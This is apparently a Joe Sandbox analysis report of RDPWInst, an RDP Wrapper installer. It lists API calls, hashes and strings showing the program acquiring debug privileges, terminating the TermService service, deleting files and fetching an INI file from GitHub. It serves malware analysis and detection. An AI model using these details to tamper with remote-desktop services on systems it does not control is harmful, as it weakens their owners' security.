                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Version
                                                    • String ID: 8[D
                                                    • API String ID: 1889659487-4257705004
                                                    • Opcode ID: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                    • Instruction ID: 2f0940f951a798b0a8c1b92e6229d48fd5c0b6d32f60b1d075f360ba34157daa
                                                    • Opcode Fuzzy Hash: 4c73b04ee2d3421a5135ac7becaf35c551135d218803d44854ea7cc165e5ef2a
                                                    • Instruction Fuzzy Hash: 7DF030B8605B419FDB00DF18E845659B7E0EB89314F00483AF485D7391D738A844CB6E
                                                    Function 0040F73C Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000,00000000), ref: 0040F757
                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,?,0040F7B7,00000000,?,00447324,0043D527,00000000,0043D55E,?,00447324,0000000B,00000000), ref: 0040F762
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                    • Instruction ID: 44d6f2536772e544dca19d4554f13a915e571bc99722c0a0b507a91726501656
                                                    • Opcode Fuzzy Hash: 8349d8abcabe035f766b9fd57bf523843a29f3c72d549b36151af9bdffc9284f
                                                    • Instruction Fuzzy Hash: B9E0CD6261470815C72065B90CC9B5B728C5B04328F040BB77D5CF35D2FA3D8554115F
                                                    Function 0040FAE8 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0040FB09
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DiskFreeSpace
                                                    • String ID:
                                                    • API String ID: 1705453755-0
                                                    • Opcode ID: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                    • Instruction ID: 58712635a06311b99fbeb36610203dfa2cb34c225fc8d295b9fe620e031658d4
                                                    • Opcode Fuzzy Hash: 061f37ac546520710da28799b67137028b65efc101c0d4d81ccfdcd92c7e26f4
                                                    • Instruction Fuzzy Hash: DC1112B5E00209AFDB04CF99C881DAFF7F9EFC8304B14C569A508E7254E6319A018B90
                                                    Function 00412C4C Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                    • Instruction ID: 9da8dff9c55e20549594a614ff7d844013acaeb15ab394cddf5a90cc700bc9e0
                                                    • Opcode Fuzzy Hash: 7e0a8c61708f8e5fe9311120f60f8f5fdb241708797c452f410103c20568c8cd
                                                    • Instruction Fuzzy Hash: 69E0927170021817E314A5695C86DEB725C9B58300F00417FBA06D7387EDB89D6046ED
                                                    Function 00412C4A Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                    • Instruction ID: 70141b24f99fd98ac1db3019ee377dee0462c825b9fd2fb3f3473e8324f2be5c
                                                    • Opcode Fuzzy Hash: ab3a7bc9c987a33d67a9bd60b42fd60c334eb7a711f5428dc5487131ec69b403
                                                    • Instruction Fuzzy Hash: 01E0DF3270031827F31495689D86EFB729C9B58300F00427BBE06D3382FDB49DA046E9
                                                    Function 00412C98 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0041524C,00000000,00415476,?,?,00000000,00000000), ref: 00412CAB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                    • Instruction ID: c0299d43d85d1b47cbbe3802d462e1d0899c6c80b318dcec9f9e75b03fa43e2d
                                                    • Opcode Fuzzy Hash: c8c474e4d6c9df360d6374c6a6ae5d3dec4118d646be2418b28a4789b35754d1
                                                    • Instruction Fuzzy Hash: 17D05EB63092202AE210525B6E45DBF56DCCBC87A2F10443BBA48C6242E268CC5693F9
                                                    Function 00411154 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LocalTime
                                                    • String ID:
                                                    • API String ID: 481472006-0
                                                    • Opcode ID: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                    • Instruction ID: 9e8cd4c1e66a35051b5eb1694121f13696e39ccab0ec977751e8beb904ec194d
                                                    • Opcode Fuzzy Hash: e8d3b386f6a7d5cca3471eaf155d8864694d2401fe0684cb90b003475a380097
                                                    • Instruction Fuzzy Hash: D1A0110080882002C2803B2A0C032383080A800A30FC80BAAB8F8A02E2EA2E023088AB
                                                    Function 0040360C Relevance: .1, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                    • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                    • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                    • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                    Function 00417D30 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 00417D39
                                                      • Part of subcall function 00417D04: GetProcAddress.KERNEL32(00000000), ref: 00417D1D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                    • API String ID: 1646373207-1918263038
                                                    • Opcode ID: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                    • Instruction ID: c99ab9519c0edb256345e3c1c1fceae5193512a11a1c4a98270a3cb03c9355dc
                                                    • Opcode Fuzzy Hash: 81f6385aaf31a6d67a1cea20af38a948cd8301cfd12a13a567f36fd7be5fd1ef
                                                    • Instruction Fuzzy Hash: 25412575A4C2085A5305AB6EB8018FA77B9DA86324374D07FF5088B745DF7CACC2876D
                                                    Function 0043F7A4 Relevance: 22.7, APIs: 2, Strings: 13, Instructions: 229sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                      • Part of subcall function 0043B7D4: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                      • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                      • Part of subcall function 0043B7D4: EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                      • Part of subcall function 0043B7D4: GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                      • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                      • Part of subcall function 0043B7D4: CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                      • Part of subcall function 0043BF00: GetCurrentProcess.KERNEL32(00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF3D
                                                      • Part of subcall function 0043BF00: OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF43
                                                      • Part of subcall function 0043BF00: GetLastError.KERNEL32(00000000,00000028,?,00000000,0043C09E,?,?,00447324), ref: 0043BF4C
                                                      • Part of subcall function 0043C1C8: OpenProcess.KERNEL32(00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                      • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                      • Part of subcall function 0043C1C8: TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                      • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                      • Part of subcall function 0043C1C8: GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                      • Part of subcall function 0043C1C8: CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001B9C,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                    • Sleep.KERNEL32(000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043F9CC
                                                    • Sleep.KERNEL32(000001F4,000003E8,?,?,00000000,0043FAEE,?,?,?,00447324), ref: 0043FA09
                                                      • Part of subcall function 0043B58C: OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5EA
                                                      • Part of subcall function 0043B58C: GetLastError.KERNEL32(?,00000000,ServicesActive,00000001,00000000,0043B6CE,?,00000000), ref: 0043B5F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$CloseHandleOpenProcess$ManagerServiceSleep$CurrentEnumEnvironmentExpandServicesStatusStringsTerminateToken
                                                    • String ID: $sD$%d.%.2d.%.2d$SeDebugPrivilege$TermService$[*] Current update date: $[*] Everything is up to date.$[*] Latest update date: $[*] Terminating service...$[*] Your INI file is newer than public file. Are you a developer? :)$[+] New update is available, updating...$[+] Update completed.$[-] Failed to download latest INI from GitHub.$rdpwrap.ini
                                                    • API String ID: 3534747103-2332903941
                                                    • Opcode ID: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                    • Instruction ID: 35adde3c6c2359a68fd4b220f91aa0339034fd12c6c7055d874297ef65b27e77
                                                    • Opcode Fuzzy Hash: 5622ae87d0b029e3d159e39c34d23c7b577837b013ae26526cbfe9c4d1771b2e
                                                    • Instruction Fuzzy Hash: D5813074E042099BDB04FBA9D48169DB7B1EF8D308F51507AF504F7392DB38AD058B6A
                                                    Function 0043D938 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 141fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0043C45C: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                    • DeleteFileW.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D985
                                                    • GetLastError.KERNEL32(00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0,000003E8), ref: 0043D98E
                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA04
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0043DB1F,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443DA0), ref: 0043DA0D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteErrorFileLast$EnvironmentExpandStrings
                                                    • String ID: $sD$[+] Removed file: $[+] Removed folder: $[-] DeleteFile error (code $[-] RemoveDirectory error (code $rdpwrap.ini
                                                    • API String ID: 1427661212-4281953003
                                                    • Opcode ID: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                    • Instruction ID: ad05ad182a3b94ca814d20fd028ad2e32e4b81082960bb03fd6afff070a44f54
                                                    • Opcode Fuzzy Hash: 956330302bce8ffae5f1d8e764e19dadb3842e9c2b8f573e08a3f0797d5542d8
                                                    • Instruction Fuzzy Hash: 31414F74A042049BDB00F7B6D94286EB375AF8D308F52813BF500B7697DA3CBD059A6E
                                                    Function 0041344C Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 97filewindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041325C: VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                      • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                      • Part of subcall function 0041325C: GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                      • Part of subcall function 0041325C: LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,00413571), ref: 004134AD
                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134E0
                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F2
                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 004134F8
                                                    • GetStdHandle.KERNEL32(000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0041350C
                                                    • WriteFile.KERNEL32(00000000,000000F4,0041358C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 00413512
                                                    • LoadStringW.USER32(00000000,0000FFE6,?,00000040), ref: 00413536
                                                    • MessageBoxW.USER32(00000000,?,?,00002010), ref: 00413550
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                    • String ID: $sD$(4A$LpD
                                                    • API String ID: 135118572-2961882766
                                                    • Opcode ID: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                    • Instruction ID: ef224b53181cf2408eecbf6e4a49f74db113686e973540ee16aa2e1e81a8a81f
                                                    • Opcode Fuzzy Hash: b1b80ecb5956461e4b881ed504ca6201c56dd4012f9b0e7eae4b86507d2a61a1
                                                    • Instruction Fuzzy Hash: E4315E71640204BEE710EBA5DC82FDA73BDEB05B05F50417AB604F61D1DE78AE808B69
                                                    Function 00409E82 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 183libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(?), ref: 00409F3F
                                                    • GetLastError.KERNEL32(?), ref: 00409F4A
                                                    • RaiseException.KERNEL32(C0FB007E,00000000,00000001,?), ref: 00409F80
                                                    • EnterCriticalSection.KERNEL32(00449C1C), ref: 00409F92
                                                    • FreeLibrary.KERNEL32(?,00449C1C), ref: 00409FAA
                                                    • LeaveCriticalSection.KERNEL32(00449C1C,?,00449C1C), ref: 00409FB7
                                                    • GetProcAddress.KERNEL32(?,?), ref: 0040A026
                                                    • GetLastError.KERNEL32 ref: 0040A031
